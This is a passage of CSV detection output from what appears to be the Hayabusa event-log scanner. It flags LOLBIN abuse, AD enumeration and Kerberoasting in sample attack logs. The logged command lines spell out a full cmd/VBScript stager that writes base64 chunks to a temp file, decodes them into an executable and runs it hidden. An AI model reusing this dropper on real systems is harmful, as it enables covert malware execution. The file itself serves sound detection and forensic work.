AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa30 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:26.444 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEACQQAAEgAAABgUAEAaAcAAAAAAAAAAAAAAAAAAAAAAABoBzQAAABWAFMAXwBW>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:26.718 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQACAAIAAAAOAAIAAgAAAA4APwAAAAAAAAAEAAAAAQAAAAAAAAAAAAAAAAAAAMYGAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAKIGAAABADAANAAwADkAMAA0AGIAMAAAADAEDAIBAEMAbwBtAG0AZQBuAHQAcwAAAEwAaQBjAGUAbgBzAGUAZAAgAHUAbgBkAGUAcgAgAHQAaABlACAAQQBwAGEAYwBoAGUAIABMAGkAYwBlAG4AcwBlACwAIABWAGUAcgBzAGkAbwBuACAAMgAuADAAIAAoAHQAaABlACAAIgBMAGkAYwBlAG4AcwBlACIAKQA7ACAAeQBvAHUAIABtAGEAeQAgAG4AbwB0ACAAdQBzAGUAIAB0AGgAaQBzACAAZgBpAGwAZQAgAGUAeABjAGUAcAB0ACAAaQBuACAAYwBvAG0AcABsAGkAYQBuAGMAZQAgAHcAaQB0AGgAIAB0AGgAZQAgAEwAaQBjAGUAbgBzAGUALgAgAFkAbwB1ACAAbQBhAHkAIABvAGIAdABhAGkAbgAgAGEAIABjAG8AcAB5ACAAbwBmACAAdABoAGUAIABMAGkAYwBlAG4AcwBlACAAYQB0AA0ACgANAAoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGEAcABhAGMAaABlAC4AbwByAGcALwBsAGkAYwBlAG4AcwBlAHMALwBMAEkAQwBFAE4AUwBFAC0AMgAuADAADQAKAA0ACgBVAG4AbABlAHMAcwAgAHIAZQBxAHUAaQByAGUAZAAgAGIAeQAgAGEAcABwAGwAaQBjAGEAYgBsAGUAIABsAGEAdwAgAG8AcgAgAGEAZwByAGUAZQBkACAAdABvACAAaQBuACAAdwByAGkAdABpAG4AZwAsACAAcwBvAGYAdAB3AGEAcgBlACAAZABpAHMAdAByAGkAYgB1AHQAZQBkACAAdQBuAGQAZQByACAAdABoAGUAIABMAGkAYwBlAG4AcwBlACAAaQBzACAAZABpAHMAdAByAGkAYgB1AHQAZQBkACAAbwBuACAAYQBuACAAIgBBAFMAIABJAFMAIgAgAEIAQQBTAEkAUwAsACAAVwBJAFQASABPAFUAVAAgAFcAQQBSAFIAQQBOAFQASQBFAFMAIABPAFIAIABDAE8ATgBEAEkAVABJAE8ATgBTACAATwBGACAAQQBOAFkAIABLAEkATgBEACwAIABlAGkAdABoAGUAcgAgAGUAeABwAHIAZQBzAHMAIABvAHIAIABpAG0AcABsAGkAZQBkAC4AIABTAGUAZQAgAHQAaABlACAATABpAGMAZQBuAHMAZQAgAGYAbwByACAAdABoAGUAIABzAHAAZQBjAGkAZgBpAGMAIABsAGEAbgBnAHUAYQBnAGUAIABnAG8AdgBlAHIA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9b8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:26.991 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo bgBpAG4AZwAgAHAAZQByAG0AaQBzAHMAaQBvAG4AcwAgAGEAbgBkACAAbABpAG0AaQB0AGEAdABpAG8AbgBzACAAdQBuAGQAZQByACAAdABoAGUAIABMAGkAYwBlAG4AcwBlAC4AAABWABsAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAEEAcABhAGMAaABlACAAUwBvAGYAdAB3AGEAcgBlACAARgBvAHUAbgBkAGEAdABpAG8AbgAAAAAAagAhAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEEAcABhAGMAaABlAEIAZQBuAGMAaAAgAGMAbwBtAG0AYQBuAGQAIABsAGkAbgBlACAAdQB0AGkAbABpAHQAeQAAAAAALgAHAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAyAC4AMgAuADEANAAAAAAALgAHAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABhAGIALgBlAHgAZQAAAAAAggAvAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQAIAAyADAAMAA5ACAAVABoAGUAIABBAHAAYQBjAGgAZQAgAFMAbwBmAHQAdwBhAHIAZQAgAEYAbwB1AG4AZABhAHQAaQBvAG4ALgAAAAAANgAHAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAGEAYgAuAGUAeABlAAAAAABGABMAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEEAcABhAGMAaABlACAASABUAFQAUAAgAFMAZQByAHYAZQByAAAAAAAyAAcAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAyAC4AMgAuADEANAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAkEsAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe90 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:27.266 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3bc | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:27.540 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\feyQV.b64 & echo Set fs = CreateObject(""Scripting.FileSystemObject"") >>%TEMP%\UbdXv.vbs & echo Set file = fs.GetFile(""%TEMP%\feyQV.b64"") >>%TEMP%\UbdXv.vbs & echo If file.Size Then >>%TEMP%\UbdXv.vbs & echo Set fd = fs.OpenTextFile(""%TEMP%\feyQV.b64"", 1) >>%TEMP%\UbdXv.vbs & echo data = fd.ReadAll >>%TEMP%\UbdXv.vbs & echo data = Replace(data, vbCrLf, """") >>%TEMP%\UbdXv.vbs & echo data = base64_decode(data) >>%TEMP%\UbdXv.vbs & echo fd.Close >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1294 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:27.815 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Set ofs = CreateObject(""Scripting.FileSystemObject"").OpenTextFile(""%TEMP%\TVupu.exe"", 2, True) >>%TEMP%\UbdXv.vbs & echo ofs.Write data >>%TEMP%\UbdXv.vbs & echo ofs.close >>%TEMP%\UbdXv.vbs & echo Set shell = CreateObject(""Wscript.Shell"") >>%TEMP%\UbdXv.vbs & echo shell.run ""%TEMP%\TVupu.exe"", 0, false >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo Wscript.Echo ""The file is empty."" >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\UbdXv.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\UbdXv.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\UbdXv.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\UbdXv.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\UbdXv.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\UbdXv.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\UbdXv.vbs & echo If Not w2 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w3 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w4 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\UbdXv.vbs & echo Next >>%TEMP%\UbdXv.vbs & echo base64_decode = strOut >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1024 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:28.092 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Base64Chars = ""ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"" >>%TEMP%\UbdXv.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\UbdXv.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & cscript //nologo %TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0xc0c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:28.113 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cscript //nologo C:\Users\SVC-SQ~1\AppData\Local\Temp\UbdXv.vbs | Path: C:\Windows\System32\cscript.exe | PID: 0x1218 | User: Svc-SQL-DB01 | LID: 0x1304385,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: | Svc: | IP Addr: ::ffff:10.23.23.9 | Status: 0x25,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: Svc-SQL-DB01 | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,CredAccess,Suspicious Kerberos RC4 Ticket Encryption,,../hayabusa-rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.42.22 | Status: 